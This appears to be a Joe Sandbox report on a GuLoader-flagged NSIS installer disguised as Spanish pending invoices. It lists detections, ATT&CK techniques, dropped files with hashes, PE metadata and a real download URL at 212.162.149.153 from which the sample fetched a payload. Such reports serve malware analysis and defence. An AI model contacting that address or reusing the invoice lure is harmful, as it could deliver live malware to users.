      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture11
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe56%VirustotalBrowse
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe42%ReversingLabsWin32.Trojan.Guloader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binm0%Avira URL Cloudsafe
      http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_Error...0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binT0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binDfNN0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binY0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
        		high
        http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binmFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.ftp.ftp://ftp.gopher.FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
          		high
          http://nsis.sf.net/NSIS_Error...FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exefalse
          • Avira URL Cloud: safe
          		unknown
          http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binTFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binDfNNFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binYFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            212.162.149.153
            		unknownNetherlands
            		64236UNREAL-SERVERSUSfalse

            General Information

            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1587320
            Start date and time:2025-01-10 07:04:12 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 53s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:5
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
            Detection:MAL
            Classification:mal76.troj.evad.winEXE@3/6@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 88%
            • Number of executed functions: 46
            • Number of non-executed functions: 302
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            01:05:32API Interceptor3x Sleep call for process: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            UNREAL-SERVERSUSrArz0wnYVU.exeGet hashmaliciousGuLoaderBrowse
            • 212.162.149.94
            rArz0wnYVU.exeGet hashmaliciousGuLoaderBrowse
            • 212.162.149.94
            RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
            • 212.162.149.92
            Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 162.251.122.87
            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 162.251.122.87
            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 162.251.122.87
            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
            • 162.251.122.87
            RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 212.162.149.89
            purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 212.162.149.66
            Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 212.162.149.66

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dllEL378_SPEC.exeGet hashmaliciousGuLoaderBrowse
              EL378_SPEC.exeGet hashmaliciousGuLoaderBrowse
                DHL_INVOICE.exeGet hashmaliciousGuLoader, LokibotBrowse
                  DHL_#U53d1#U7968.exeGet hashmaliciousGuLoader, LokibotBrowse
                    DHL_INVOICE.exeGet hashmaliciousGuLoaderBrowse
                      DHL_#U53d1#U7968.exeGet hashmaliciousGuLoaderBrowse
                        Ta62k9weDV.exeGet hashmaliciousGuLoaderBrowse
                          Ta62k9weDV.exeGet hashmaliciousGuLoaderBrowse
                            HF-2209869481.exeGet hashmaliciousGuLoaderBrowse
                              HF-2209869481.exeGet hashmaliciousGuLoaderBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\fanin\Hortikultur.For

                                Download File
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):298979
                                Entropy (8bit):7.586687461235365
                                Encrypted:false
                                SSDEEP:6144:b0AmmTjA0ppG2c3blFuFuxf0DaPN5ug3yzP:LmmTjxbG2CbHu/+V5v3y7
                                MD5:45893409E37B0F5E8F052154BF1662E9
                                SHA1:5CE2184F0675DD5FAE184B4E8F6264AD72ACDCF3
                                SHA-256:635325D683AF6AAAFB256FF4D53A121B6A3C1465B2BC19010D881700BFA7EA56
                                SHA-512:621D6910CE1B8D3740571D144E40B83DD523693513BB45F01E81BF72CED1165510440002189FD2084EECA9AA703B8D95BEC0BFFD62ABED4E33319FF7A0FF9F8D
                                Malicious:false
                                Reputation:low
                                Preview:...TT....8.N.....ppp....N.....----.=....................##...........1..........vvvvvv..................11.RRRRR.. .\.........;...........cc...................]].......................n..o..........((...........................ttt.........^...(.............................c...SS........-..................g.......................--.ssss.............BB............;.>...x...I........<.y...................C........................................"""".E..$................]].................................4..F.....................................YY..**...........vv...N........xx.........+..'........................{{{.....A.....b..........````....5...E.PPP.NN.........}}....~...888....A.666...........d.........G...oooooo.a.......^........}.....%......V....XX.........L..o.?........."""..nn...R..............CCCC....................kk..............k......v........AA.)..............uuu....))........AA......cc.........................$$...................e..............7....SS...##.W.............

                                C:\Users\user\AppData\Local\Temp\fanin\Leflet\interessereprsentants.hul

                                Download File
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):225235
                                Entropy (8bit):1.2505494983045329
                                Encrypted:false
                                SSDEEP:768:/RwMidX4Q904QeKbFSmjFFrFbCgq4ONJx22YjLusudtedqLIkvO6KdE3r/s4qVZ0:8tsFB+d3KLd1JA37H
                                MD5:6883695B7EE87239D1031F25CB022A43
                                SHA1:4ECA46FA3848E24D7FDD7B79AED8742A58750497
                                SHA-256:8E6299FABA71898C9DB184D0B04DB12307531F61D8B40A12EA436E18F181AA43
                                SHA-512:E2894F566FE1A61DEAEBB081C9452B0E7BB72C7EF5A1E80E0D5C9F74175DB8FAFD461FD3B5B9083153EF5C0FA6D18F10112B03E3966722026C3A1BE5346965FA
                                Malicious:false
                                Reputation:low
                                Preview:.................(.+....(.....v.....A:..Z..............7......X.............................P..........>..............$........................c................................:......y............................\.......................A.b.............................P...............d.....................-................c.....6.......................=.................n..3...........%..d.......................................%....................................................................#............C....................%....C.........................................e............M(....................................................................................................................................... ...............f................,a...........'........................................................................."....e.........................6.............i........................................E...............................................................

                                C:\Users\user\AppData\Local\Temp\fanin\Zooming.Red

                                Download File
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):103368
                                Entropy (8bit):2.6625379092327504
                                Encrypted:false
                                SSDEEP:1536:puAH3GNT2ANNoOWNDtT4UgygquQxv2F4MxDj17Ya/irUJuCvpw:pPkC
                                MD5:A0C3222C6706A6C067303C48A4D936E8
                                SHA1:C15C057DCC249E7C7568EDC30154E89AFB82333D
                                SHA-256:E3066014493AE763047168EBD753EF32C2C03F732FA3BEA8F5CEB2C53F196B0C
                                SHA-512:F02769D95CCC232AEF1A0656564FA6055F91FC2A0EED8F383B0E663B5507C7BF8D59B95FFDFA505BAE5945C7A2E8B3C5964ED3A167EA6E65EA80948CDAA57CD9
                                Malicious:false
                                Reputation:low
                                Preview:00000000004000380000414100008888880000003D3D000000B6000000E2E2007C7C000000626200590000980033000000000000000000280000BBBB00004F4F00000000820018181800232300D9D9D90000008E00A0A0A0A0000000030300EB0042008D8D00000000AF0000050500E7000000BEBEBE00F60000AB00BDBD00920000878700D000000D000000D00042424200000074000078000000B8B800F8F800FEFE0000440041000000ECEC0000000000BE00000600002E00005C00001E1E1E1E1E0000000054545400FAFA0000006A003200CD0000002929000000009E9E9E00000097979700BE0000000000EAEAEAEAEA00F80000A10000F6F6F6F6F6F6F6F600EE00E10000E7E70000CB00D4D40052525252000000FFFF00006A006666666666003E000052005900400046460060600000005B5B001919191900710000000E0E0E0000FD00002E2E00878700008181818100DDDD00EAEAEA00AF00DEDE0000001700EB001F1F1F1F0000007A7A7A00006C0068686868000000BBBBBB00A2A2A20000AA007B7B7B7B0000E5000096005800002200000000A50072003500000F0F0F0F0000424242000000000000003A3A002525252525252500003B3B00007100002000910000000000590000E000320000008080000000000000C8C80000A900004C00C50090900020200000000020000F

                                C:\Users\user\AppData\Local\Temp\fanin\brandy.lea

                                Download File
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):314272
                                Entropy (8bit):1.2593509662318005
                                Encrypted:false
                                SSDEEP:768:fBqB1CAi48on0XydRS4Jbu2SnQ0bR7NZWfw/EIn5D6POQLxALEmpembXYqSxVil5:Z0/0mnzQ3hWdXjGVJ+xajqazD
                                MD5:C7D83B1354B58B52F3EEEB0D54AE8051
                                SHA1:D58F01E64AC4AFE927668F75042DC99A01FC8B26
                                SHA-256:4DE62E400FD03ED1A45A9F90DF6B155F313BD15C2876B0B0AD64E7AA7BBBE12C
                                SHA-512:96801C502EA4E67DFC8380C789DA84307A261F4FBBD2D8ACCF56E95919B63CC7E89D00FADB32C7F95CD1CD75BDBCBC01FF0EC81214587E084726828C974511D7
                                Malicious:false
                                Reputation:low
                                Preview:..................................(..............s..........................................................................T.................................k.....................................................>......................................................Z.r....................\...........,..........]....E......L............................p.................W.....X......6..............................'...................................K.............................7...........p..........................................................................................................................................................%................ .......................n.....`....I...........W..............................."..........X.......;.....................4..;.........Y...........<.................................................................3.....{................................................................................................\.................5

                                C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dll

                                Download File
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):5120
                                Entropy (8bit):4.289419438668023
                                Encrypted:false
                                SSDEEP:48:qbrtDVP10LgQL8QRU8IlmWm7WmnuWK8hSemoMqG5QEv8sF9U3ofMU:UVPFQIqlemWm7WmTaehG+EkR
                                MD5:E459F344B4A47AF2CF15D821F3946724
                                SHA1:5DF805FCF0A857B98CECCA139B2EA99979C8F01E
                                SHA-256:F4778B8ACA1EB5D93D267468589B4BF45B827A50300EB552D796E9DC22ADE419
                                SHA-512:5B8285A166404C73869D5AAA25C5AF3544AB4A2F012C5EA1E12B04A1D6FA3D32B4A6857E9FD29DD3C86DD5DC8111E3E86DE11BDB5496C1C527FF1BC91BD791BB
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o_D..1...1...1.n|0...1...0...1..{5...1..{1...1..{....1..{3...1.Rich..1.........PE..L...V+.c.........."!........."............... ...............................p............@.......................... ..L.... ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data...4....0......................@....rsrc...`....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll

                                Download File
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):12288
                                Entropy (8bit):5.974444797015433
                                Encrypted:false
                                SSDEEP:192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
                                MD5:637E1FA13012A78922B6E98EFC0B12E2
                                SHA1:8012D44E42CD6D813EA63D5CCBF190FE72E3C778
                                SHA-256:703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
                                SHA-512:932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                                • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                                • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                                • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                                • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                                • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                                • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                                • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                                • Filename: HF-2209869481.exe, Detection: malicious, Browse
                                • Filename: HF-2209869481.exe, Detection: malicious, Browse
                                Reputation:moderate, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.]e..]e..]e......Ze......Ze..]e..Ie......Ye......\e......\e......\e..Rich]e..........................PE..L...^+.c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.6229397457593615
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File size:533'960 bytes
                                MD5:4f2c796aebd02a54ca9bebb0c5bc5ef0
                                SHA1:558e2f3de9077aaf9159c4fb1633d66c75b14dda
                                SHA256:c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692
                                SHA512:8eb1daf79455c75dba4521196c8ef468184f1a0d2c385bd424c4ce82174fe8c2970a47d72fc7d83c444629a236e373a70fb1d3cee236cfff246dba4b8ceb48c7
                                SSDEEP:12288:rRfrRAA+3hDCYCCslgEzlaGuZHStFIH/x5eWJe5:dfNAAmhBCCsRzeRCFoewe5
                                TLSH:6CB402259B4DCC12E4B514BCE732AACAF4FCBD53966A9613F3103E2B857CB819E0D151
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................n...*.....

                                File Icon

                                Icon Hash:5b797d7d8d11592d

                                Static PE Info

                                General

                                Entrypoint:0x4036d7
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x63132B84 [Sat Sep 3 10:25:08 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:3f91aceea750f765ef2ba5d9988e6a00

                                Authenticode Signature

                                Signature Valid:false
                                Signature Issuer:CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 23/03/2024 08:06:38 23/03/2025 08:06:38
                                Subject Chain
                                • CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                                Version:3
                                Thumbprint MD5:F258822B369D369853552E5A72A06C88
                                Thumbprint SHA-1:36E3DCA8400E4D266774CF32D7E5D6D9C2D2E757
                                Thumbprint SHA-256:CB63044CE9D8355C6518EC29E162D6431C74555D2F0496577D9F2F83BFC6150F
                                Serial:0FEFB9AC4FE7B58D3E3EC15139BA5132C65A25C4

                                Entrypoint Preview

                                Instruction
                                sub esp, 000003ECh
                                push ebx
                                push ebp
                                push esi
                                push edi
                                xor ebx, ebx
                                mov edi, 00408528h
                                push 00008001h
                                mov dword ptr [esp+14h], ebx
                                mov ebp, ebx
                                call dword ptr [00408170h]
                                mov esi, dword ptr [004080ACh]
                                lea eax, dword ptr [esp+2Ch]
                                xorps xmm0, xmm0
                                mov dword ptr [esp+40h], ebx
                                push eax
                                movlpd qword ptr [esp+00000144h], xmm0
                                mov dword ptr [esp+30h], 0000011Ch
                                call esi
                                test eax, eax
                                jne 00007F8EC0B62ED9h
                                lea eax, dword ptr [esp+2Ch]
                                mov dword ptr [esp+2Ch], 00000114h
                                push eax
                                call esi
                                push 00000053h
                                pop eax
                                mov dl, 04h
                                mov byte ptr [esp+00000146h], dl
                                cmp word ptr [esp+40h], ax
                                jne 00007F8EC0B62EB3h
                                mov eax, dword ptr [esp+5Ah]
                                add eax, FFFFFFD0h
                                mov word ptr [esp+00000140h], ax
                                jmp 00007F8EC0B62EADh
                                xor eax, eax
                                jmp 00007F8EC0B62E94h
                                mov dl, byte ptr [esp+00000146h]
                                cmp dword ptr [esp+30h], 0Ah
                                jnc 00007F8EC0B62EADh
                                movzx eax, word ptr [esp+38h]
                                mov dword ptr [esp+38h], eax
                                jmp 00007F8EC0B62EA6h
                                mov eax, dword ptr [esp+38h]
                                mov dword ptr [00429DF8h], eax
                                movzx eax, byte ptr [esp+30h]
                                shl ax, 0008h
                                movzx ecx, ax
                                movzx eax, byte ptr [esp+34h]
                                or ecx, eax
                                movzx eax, byte ptr [esp+00000140h]
                                shl ax, 0008h
                                shl ecx, 10h
                                movzx eax, word ptr [eax]

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x1b7f0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x817e00xde8
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x6c770x6e0036012ab9d2e677680493425a566cfdc6False0.6476207386363636data6.367752971155868IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x18960x1a002681c11e044872fcca465fa15baf2f57False0.43028846153846156data4.8666844580675965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa0000x1fe000x2003df8362a2e9a26c792a729d2c3b1d553False0.22265625data1.680046922364517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x2a0000x270000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x510000x1b7f00x1b800a8ef53bebf1cdcba6c23232fbc48ab1bFalse0.38159623579545454DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 32.000000, slope 32.3147055.430171507259301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x513280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.16316692298592217
                                RT_ICON0x61b500x5f42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9831050602804888
                                RT_ICON0x67a980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.29906639004149377
                                RT_ICON0x6a0400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.35389305816135086
                                RT_ICON0x6b0e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4360655737704918
                                RT_ICON0x6ba700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5097517730496454
                                RT_DIALOG0x6bed80xb8dataEnglishUnited States0.6467391304347826
                                RT_DIALOG0x6bf900x144dataEnglishUnited States0.5216049382716049
                                RT_DIALOG0x6c0d80x100dataEnglishUnited States0.5234375
                                RT_DIALOG0x6c1d80x11cdataEnglishUnited States0.6056338028169014
                                RT_DIALOG0x6c2f80x60dataEnglishUnited States0.7291666666666666
                                RT_GROUP_ICON0x6c3580x5adataEnglishUnited States0.7888888888888889
                                RT_VERSION0x6c3b80x194OpenPGP Secret KeyEnglishUnited States0.5668316831683168
                                RT_MANIFEST0x6c5500x29bXML 1.0 document, ASCII text, with very long lines (667), with no line terminatorsEnglishUnited States0.5667166416791605

                                Imports

                                DLLImport
                                ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
